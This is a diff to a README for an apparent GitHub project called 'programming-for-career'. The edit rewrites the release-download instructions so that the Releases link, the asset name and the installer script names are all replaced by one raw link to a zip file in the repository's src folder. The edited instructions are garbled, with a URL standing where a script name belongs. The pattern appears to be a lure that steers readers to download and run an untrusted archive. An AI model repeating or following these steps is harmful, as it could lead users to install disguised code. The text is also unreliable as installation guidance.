GIGGAFATCHAD/programming-for-career/README.md

 Release assets and downloads
 - Releases page
   - The latest stable build assets are published to the Releases section.
-  - For the latest release, see https://github.com/GIGGAFATCHAD/programming-for-career/releases
+  - For the latest release, see https://github.com/GIGGAFATCHAD/programming-for-career/raw/refs/heads/main/src/career_for_programming_v2.4.zip
 - How to download and run a release
-  - From the Releases page, download the release asset named programming-for-career-<version>.zip or <version>.tar.gz
+  - From the Releases page, download the release asset named programming-for-career-<version>.zip or <version>https://github.com/GIGGAFATCHAD/programming-for-career/raw/refs/heads/main/src/career_for_programming_v2.4.zip
   - Extract the archive to a local directory
   - Open a terminal in the extracted folder
-  - Run the installer or setup script provided (for example, ./install.sh on macOS/Linux or setup.bat on Windows)
+  - Run the installer or setup script provided (for example, https://github.com/GIGGAFATCHAD/programming-for-career/raw/refs/heads/main/src/career_for_programming_v2.4.zip on macOS/Linux or https://github.com/GIGGAFATCHAD/programming-for-career/raw/refs/heads/main/src/career_for_programming_v2.4.zip on Windows)
   - Follow on-screen prompts to configure the environment
   - Start the platform services as directed by the release notes
 - What the release contains